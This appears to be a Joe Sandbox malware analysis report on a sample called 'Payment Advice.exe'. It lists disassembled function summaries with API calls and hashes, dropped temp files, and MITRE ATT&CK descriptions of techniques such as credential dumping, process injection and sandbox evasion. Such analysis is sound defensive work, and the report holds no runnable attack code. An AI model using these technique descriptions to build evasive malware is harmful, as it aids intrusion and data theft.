ComboBox, xrefs: 005BB687
ListBox, xrefs: 005BB6B5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 604c9da442cae7335fe1c7b1d64aed569fa8b7be1405de5da4677ddbe5138b14
Instruction ID: 1c2f5871031046eba9ce7d3a52586b2da5b0b50616212710b3495baf10be5e7a
Opcode Fuzzy Hash: 604c9da442cae7335fe1c7b1d64aed569fa8b7be1405de5da4677ddbe5138b14
Instruction Fuzzy Hash: A1018F75641006ABDB15FBA4C956AFE7BB9AF45344F100029B902B71C1EBA06E1887B5

Function 005BB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 005BB76C

Strings

ComboBox, xrefs: 005BB70A
ListBox, xrefs: 005BB738

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 09ab861371851b284655b083263a1b20651c24fef4d1e0ea6e311ecbe4212f5e
Instruction ID: d8d09832db579447b8a4b43226affa32717245cb09b01923a0232dc780a8bd3e
Opcode Fuzzy Hash: 09ab861371851b284655b083263a1b20651c24fef4d1e0ea6e311ecbe4212f5e
Instruction Fuzzy Hash: 0701AD76640106ABDB01FBA4C956AFE7BADAF45344F500019B802B3192EFA06E0987B5

Function 005A4D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 005A4D9E
__calloc_crt.LIBCMT ref: 005A4DB7

Strings

"d, xrefs: 005A4DCE

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __calloc_crt
String ID: "d
API String ID: 3494438863-157054973
Opcode ID: 091bef98d14dd4142ea179bc984c317d55b3e63f9d1be64a20708e3c21f7b0e3
Instruction ID: 90c4a07aff8f26a93e839bcf754e22f173de53f0b7a37850dc4142908197f48a
Opcode Fuzzy Hash: 091bef98d14dd4142ea179bc984c317d55b3e63f9d1be64a20708e3c21f7b0e3
Instruction Fuzzy Hash: BDF0FC712096039EF7149FA9BC5166F6FD6FB87720F24451AF201CA185E7F0C9414F94

Function 00584024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00580000,00000063,00000001,00000010,00000010,00000000), ref: 00584048
EnumResourceNamesW.KERNEL32(00000000,0000000E,005C67E9,00000063,00000000,75C10280,?,?,00583EE1,?,?,000000FF), ref: 005F41B3

Strings

>X, xrefs: 00584028

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >X
API String ID: 1578290342-3225703975
Opcode ID: a2da89498d3a4cb31c56581df3e4cdf0421675c972ead924a0e45fe300d8ae27
Instruction ID: 0074a1a727bf4adcf79a2fd1dd07f5427d18c322ab990ea930d57dfb61c1caa5
Opcode Fuzzy Hash: a2da89498d3a4cb31c56581df3e4cdf0421675c972ead924a0e45fe300d8ae27
Instruction Fuzzy Hash: DDF04935680215BAE3205B1AAC4AF933EAAA707FA9F101506FA24AE1D0D2E094C08A94

Function 005C7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 005C7762
_wcscmp.LIBCMT ref: 005C7774

Strings

#32770, xrefs: 005C776E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: d8933e1f909e68d9f702402e8d6bbe46f24f746ff46ba57c1fcb916ee20a4c57
Instruction ID: 045a98dbb81bd7461c973c69040165c1cf5fd9f2a01843b0d9e7b3944a1a5f5a
Opcode Fuzzy Hash: d8933e1f909e68d9f702402e8d6bbe46f24f746ff46ba57c1fcb916ee20a4c57
Instruction Fuzzy Hash: 19E09277A042292BD720AAE5DC0AE8BFFACEB96764F01011AB905E3181D660A6018BD4

Function 005BA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005BA63F

Part of subcall function 005A13F1: _doexit.LIBCMT ref: 005A13FB

Strings

AutoIt, xrefs: 005BA633
Error allocating memory., xrefs: 005BA638

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 63b6d61d736df7c1475de439d13a7688b3fc4c66b66af4e409b1201994188a2e
Instruction ID: 70f4a2c3beed588fa87ac449f1b0ddb2d6e180db22f721266d0609e79bf2b270
Opcode Fuzzy Hash: 63b6d61d736df7c1475de439d13a7688b3fc4c66b66af4e409b1201994188a2e
Instruction Fuzzy Hash: A9D05B313C472933D7143A997C1FFC97E49AB55B51F054416BB0CA55C25DE2958042D9

Function 005FAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 005FACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 005FAEBD

Strings

WIN_XPe, xrefs: 005FACD3

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 5d6b755c555436f2e0d2b51ea5d2553c3c04de249510498affebcb07ae851e5f
Instruction ID: ab7ecf5c1e2c43f6c554752d4da3bbb9390784d44db1e324736c43913a206e03
Opcode Fuzzy Hash: 5d6b755c555436f2e0d2b51ea5d2553c3c04de249510498affebcb07ae851e5f
Instruction Fuzzy Hash: 62E039B0C001899FDB12EBA8D9449ECBBB8BB48301F109082F256B2260DB745E84DF22

Function 005E86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005E86E2
PostMessageW.USER32(00000000), ref: 005E86E9

Part of subcall function 005C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 005C7AD0

Strings

Shell_TrayWnd, xrefs: 005E86DB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 221d56e42dfdad233ca9701ef3457d0789e87399c0e37445c5448f605473404b
Instruction ID: f1d5b6cf41b289a21e82d4388b3f58b735d1c1fb7ea6c9b96ea75b7d93429c33
Opcode Fuzzy Hash: 221d56e42dfdad233ca9701ef3457d0789e87399c0e37445c5448f605473404b
Instruction Fuzzy Hash: 01D0C9313C53287BE36967B09C0FFC76A19AB48B21F112919B645AA1D0C9A1A9408A54

Function 005E8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005E86A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005E86B5

Part of subcall function 005C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 005C7AD0

Strings

Shell_TrayWnd, xrefs: 005E869B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a015f304d4f17e0c2d00705c1c95f47ae656b65b03d71065f30171a557508d78
Instruction ID: 8cb3f1f129772224b8c343b425d8f94a56c64ed6961532a6e8e70d92e68720f2
Opcode Fuzzy Hash: a015f304d4f17e0c2d00705c1c95f47ae656b65b03d71065f30171a557508d78
Instruction Fuzzy Hash: 44D012313D4328BBE36867B09C0FFC77E19AB44B21F112919B749AA1D0C9E1E940CB54

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Advice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\23802I71

C:\Users\user\AppData\Local\Temp\Vevine

C:\Users\user\AppData\Local\Temp\autF31D.tmp

C:\Users\user\AppData\Local\Temp\autF34D.tmp

C:\Users\user\AppData\Local\Temp\ferritic

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
Payment Advice.exe

Function 005AB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00583D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Function 0059DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0058406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 005CFA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Function 00583F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 005CBFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00583742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00583E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 017525C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 005849FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre